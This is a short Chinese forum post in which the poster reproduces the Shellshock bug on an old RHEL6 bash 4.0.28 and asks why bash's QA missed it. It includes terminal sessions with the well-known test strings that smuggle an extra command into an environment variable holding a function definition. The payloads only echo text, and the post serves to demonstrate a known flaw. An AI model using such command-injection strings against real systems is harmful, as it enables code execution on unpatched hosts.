- 论坛徽章:
- 84
|
找旧版本装上, 复现了: 挺有意思的, 明显是个bug; bash 的qe怎么没有测出来了呢- [root@hp-dl380pg8-14 ~]# VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
- Bash is vulnerable!
- Bash Test
- [root@hp-dl380pg8-14 ~]# HELLO="() { echo 'Hello'; }" bash -c HELLO
- Hello
- [root@hp-dl380pg8-14 ~]# LANG=C bash --version
- GNU bash, version 4.0.28(1)-release (x86_64-redhat-linux-gnu)
- Copyright (C) 2009 Free Software Foundation, Inc.
- License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
- This is free software; you are free to change and redistribute it.
- There is NO WARRANTY, to the extent permitted by law.
- [root@hp-dl380pg8-14 ~]# LANG=C rpm -qi bash-4.0.28-1.el6
- Name : bash Relocations: (not relocatable)
- Version : 4.0.28 Vendor: Red Hat, Inc.
- Release : 1.el6 Build Date: Wed Sep 2 04:27:56 2009
- Install Date: Thu Jan 28 14:22:44 2016 Build Host: x86-001.build.bos.redhat.com
- Group : System Environment/Shells Source RPM: bash-4.0.28-1.el6.src.rpm
- Size : 2641765 License: GPLv2+
- Signature : (none)
- Packager : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
- URL : http://www.gnu.org/software/bash
- Summary : The GNU Bourne Again shell
- Description :
- The GNU Bourne Again shell (Bash) is a shell or command language
- interpreter that is compatible with the Bourne shell (sh). Bash
- incorporates useful features from the Korn shell (ksh) and the C shell
- (csh). Most sh scripts can be run by bash without modification.
- [root@hp-dl380pg8-14 ~]# HELLO="() { echo 'Hello'; }; echo fff" bash -c "echo kkk"
- fff
- kkk
复制代码 |
|